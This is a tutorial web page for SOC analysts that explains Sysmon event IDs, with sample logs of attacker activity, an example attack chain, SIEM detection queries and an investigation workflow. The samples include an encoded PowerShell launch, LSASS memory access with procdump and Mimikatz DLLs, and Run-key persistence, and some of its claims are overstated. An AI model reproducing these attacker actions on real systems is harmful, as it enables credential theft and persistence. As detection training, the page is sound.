Home > SOC Analysis

Sysmon Logs

Sysmon (System Monitor) is the most powerful and detailed logging source available on Windows. It provides deep visibility into process execution, network connections, registry changes, file creation, driver loading, WMI operations, named pipes, and more.
For a SOC analyst, Sysmon is the single most important tool for detecting modern attacks, especially fileless malware, lateral movement, persistence, privilege escalation, and post-exploitation.

This chapter explains Sysmon in full-scale, ultra-practical SOC depth, including real log samples, exact attacker footprints, analyst workflows, SIEM queries, and full attack timelines.

Why Sysmon Is Critical for SOC

Default Windows logs are limited.
Sysmon fixes that by providing:

  • Full command-line visibility

  • Parent-child process tracking

  • Network connection telemetry

  • DLL and driver load visibility

  • Registry and file operations

  • WMI operations

  • Hashes of executables

  • Ability to correlate nearly any malicious behavior

Attackers cannot hide easily when Sysmon is deployed with a strong config.

Sysmon Data Sources

Sysmon uses the Microsoft-Windows-Sysmon/Operational event channel.

Log file:

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx

Forwarded to SIEM via Winlogbeat or WEF.

Sysmon Event IDs (Practical Focus)

Below are the actual Sysmon events SOC analysts use, with realistic raw logs and attack interpretation.

Event ID 1 — Process Creation (Most Important Event)

This log reveals:

  • Full command line

  • Parent process

  • Integrity level

  • Hash of executed process

Raw Example:

EventID=1
ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine=powershell.exe -nop -w hidden -enc JAB...
Hashes=SHA256=F23AB12...
User=DESKTOP\mayur

Attack Interpretation:

  • Word → PowerShell → encoded command

  • 100% indication of macro malware or phishing payload

Sysmon Event ID 1 is the foundation of nearly every malware detection rule.

Event ID 2 — File Creation Time Changed

Used mostly for:

  • timestomping

  • anti-forensics

Raw Example:

EventID=2
TargetFilename: C:\Users\mayur\Downloads\payload.exe
CreationUtcTime modified

If a file’s timestamp changes without modification → suspicious.

Event ID 3 — Network Connection

Logs outbound and inbound connections made by processes.

Raw Example:

EventID=3
Image=powershell.exe
DestinationIp=185.22.111.10
DestinationPort=443
Protocol=tcp

Attack Insight:

  • PowerShell connecting to unknown IP → possible C2

  • Combine with Event 1 for full pivot

This is critical for detecting:

  • malware beaconing

  • lateral movement

  • exfiltration

  • payload downloads

Event ID 6 — Driver Loaded

Used for detecting:

  • rootkits

  • malicious kernel drivers

  • AV tampering

Example:

EventID=6
ImageLoaded: C:\Windows\Temp\malDrv.sys

Event ID 7 — Image Loaded

Logs DLL loading.

Useful for:

  • Process injection

  • Mimikatz module loads

  • Reflective DLL injections

Example:

EventID=7
Image: lsass.exe
Loaded DLL: mimilib.dll

Huge red flag.

Event ID 8 — CreateRemoteThread (Critical for Credential Theft Detection)

Used for:

  • Mimikatz

  • Cobalt Strike

  • Process injection

  • Lateral movement

Raw Example:

EventID=8
SourceImage=cmd.exe
TargetImage=lsass.exe
StartAddress=0x00007FF...

If a user process injects into LSASS → malicious.

Event ID 9 — Raw Disk Access

Useful for detecting:

  • ransomware

  • disk-level tampering

Example:

EventID=9
Image=malware.exe
Device=\Device\HarddiskVolume1

Event ID 10 — Process Access (LSASS Protection)

Logs attempts to read other process memory.

Most critical Sysmon event for detecting:

  • Mimikatz

  • Credential dumping

  • Token theft

Example:

EventID=10
SourceImage=C:\Tools\procdump.exe
TargetImage=lsass.exe
GrantedAccess=0x1FFFFF

If process is not legitimate → credential dumping attempt.

Event ID 11 — File Create

Logs creation of files.

Useful for:

  • dropped payloads

  • malware staging

  • suspicious persistence

Example:

EventID=11
TargetFilename=C:\Users\Public\backdoor.exe

Event ID 12 – 14 — Registry Events

Covers:

  • Registry creation

  • Registry modification

  • Value changes

Used to detect:

  • registry-based persistence

  • disabling security controls

Example:

EventID=13
TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Details = "powershell -enc JAB..."

Event ID 15 — File Stream Created

Detects hidden data inside NTFS alternate data streams.

Example:

EventID=15
ads.zip:Zone.Identifier

Used by:

  • malware

  • data hiding techniques

Event ID 19–21 — WMI Events

Detect:

  • WMI persistence

  • Remote execution

  • Recon techniques

Example:

EventID=19
WmiEventFilterName: PersistenceFilter

Attackers often use WMI for stealthy persistence.

Event ID 22 — DNS Query

Detects suspicious DNS resolution patterns.

Example:

EventID=22
QueryName=abcdnsqxpwoi.ru
Image=powershell.exe

Used to detect:

  • DGA domains

  • C2

  • Malware callbacks

Sysmon in Real Attack Detection

Below is a real-world attack chain extracted using Sysmon.

Step 1 — Phishing Document Execution

Sysmon Event 1:

WINWORD.EXE → powershell.exe -enc JAB...

Step 2 — Payload Download

Event 3:

powershell.exe → 185.22.110.20:443

Step 3 — Credential Dump

Event 10:

powershell.exe → lsass.exe (memory access)

Step 4 — Lateral Movement Prep

Event 1 & 3:

cmd.exe launching winrm commands
SMB connections to other hosts

Step 5 — Persistence Created

Event 13:

Registry Run key created

Step 6 — Exfiltration

Event 3:

powershell.exe → 91.22.10.4:8080 sending large data

Sysmon ties the whole attack together with exact process lineage.

SIEM Queries for Sysmon Attacks

Detect suspicious parent → child chains

event.code:1 AND ParentImage:*winword.exe* AND Image:*powershell.exe*

Detect suspicious network connections

event.code:3 AND DestinationIp NOT IN whitelist

Detect LSASS memory access

event.code:10 AND TargetImage:lsass.exe

Detect script-based persistence

event.code:13 AND TargetObject:*CurrentVersion\\Run*

Detect C2 DNS queries

event.code:22 AND QueryName.keyword:*.ru

Detect process injection

event.code:8 AND TargetImage:lsass.exe

Analyst Workflow When Investigating Sysmon Logs

  1. Start with Event ID 1
    Check parent, command line, hashes.

  2. Check Event ID 3
    Determine C2 destinations.

  3. Check Event ID 10 & 8
    Identify credential dumping and injection.

  4. Check Event ID 13
    Look for persistence.

  5. Check Event ID 22
    See if malware contacted DGA / suspicious domains.

  6. Check Event ID 11
    Look for dropped payloads.

  7. Map all events to a timeline
    Build attack narrative.

  8. Confirm whether behavior matches known attack patterns

  9. Escalate to incident response if malicious

Intel Dump

  • Sysmon logs provide deep visibility missing in normal Windows logs.

  • Key events include:

    • 1 (process creation)

    • 3 (network connection)

    • 10 (process access)

    • 8 (remote thread)

    • 13 (registry persistence)

    • 11 (file creation)

    • 22 (DNS query)

  • Sysmon exposes macro malware, fileless attacks, C2 communication, credential dumping, lateral movement, and persistence.

  • Analysts rely heavily on Sysmon to build attack timelines and identify parent-child process chains.

  • SIEM queries focus on encoded commands, LSASS access, suspicious network connections, registry persistence, and anomalous DNS traffic.

HOME LEARN COMMUNITY DASHBOARD